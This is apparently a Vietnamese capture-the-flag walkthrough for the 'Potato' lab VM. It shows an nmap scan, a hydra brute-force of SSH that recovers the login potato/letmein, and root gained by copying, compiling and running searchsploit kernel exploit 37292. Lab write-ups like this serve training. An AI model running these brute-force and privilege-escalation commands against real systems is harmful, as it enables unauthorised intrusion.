Thực hành tấn công và thâm nhập máy chủ Potato

Thực hành tấn công và thâm nhập máy chủ Potato

Table of contents

No heading

No headings in the article.

Description: Difficulty: Easy to Medium. Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox). Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). Information: Your feedback is appreciated - Email: . Hint: "If you ever get stuck, try again with the name of the lab"

Link tải bài Lab: Here

Những lưu ý trước khi vào làm bài lab:

  • Tải bài lab xxxx.ova về bằng đường link ở trên, xong rồi sau đó import vào máy ảo VMWare hoặc VirtualBox

  • Sau khi import thì các bạn hãy setting chuyển chế độ Network về dạng NAT

  • Khởi động bài lab và thực hành tấn công, khai thác

Oke vậy cùng vào việc thôi.

1. Khai thác thông tin

Đầu tiên mở web lên ngó qua xem có cái gì đã >.< Screenshot 2021-10-25 201658.png

Nguyên củ khoai tây và không 1 thứ gì khác. Ngó qua Source thì cũng chẳng có gì giá trị quả

Giờ chúng ta sẽ sử dụng nmap để scan máy chủ và liệt kê các thông tin cần thiết cho việc tấn công

nmap -T4 -sC -p- -A IP_Victim

Lưu ý: IP_Victim ở mỗi máy là khác nhau nên mình sẽ để tổng quát

Screenshot 2021-10-25 200636.png

Oke vậy là chúng ta đã có thông tin cơ bản về máy chủ, port 80 cho dịch vụ http và port 7120 mở cho OpenSSH

2. Bắt đầu tấn công

Do có dịch vụ ssh nên mình sẽ thử với nó. Đầu tiên mình thử connect mặc định mọi thứ

ssh IP_Victim -p 7120

Kết quả là không đúng thông tin đăng nhập😭

Oke vì vậy để tìm thông tin đăng nhập thì chúng ta sẽ thử Brute Force nó bằng công cụ hydra với username là "potato"

hydra -l potato -P /usr/share/wordlists/rockyou.txt ssh://192.168.216.138:7120 -t 64

Screenshot 2021-10-25 203145.png

Oke, tốt, vậy là chúng ta đã có username là "potato" và password là "letmein"

Tiến hành đăng nhập luôn:

ssh potato@IP_Victim -p 7120 và nhập password chúng ta có được phía trên

3. Leo thang đặc quyền

Sau khi đăng nhập chúng ta sẽ thử xem nó đang chạy phiên bản hệ điều hành nào bằng câu lệnh uname -a

Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Đây là 1 phiên bản Ubuntu đã khá cổ, phiên bản hiện tại là Ubuntu 20.10 (Groovy Gorilla)

Thế thì thử searchsploit xem sao

searchsploit ubuntu 3.13

Screenshot 2021-10-25 204032.png

Hmm, có khá nhiều thứ để nghịch.

Sử dụng câu lệnh sau để tạo 1 file thực thi bằng C và lưu vào thư mục hiện tại

searchsploit -m 37292

rồi sau đó chúng ta sẽ copy file này qua máy victim bằng câu lệnh

scp -P 7120 37292.c potato@potato.box

Sau khi chuyển file thành công chúng ta sẽ thực thi file "37292.c" này

gcc -o root 37292.c

./root

Screenshot 2021-10-25 205115.png

Okay, như này là chúng ta đã nâng cấp quyền lên root, giờ thì vào đọc flag thôi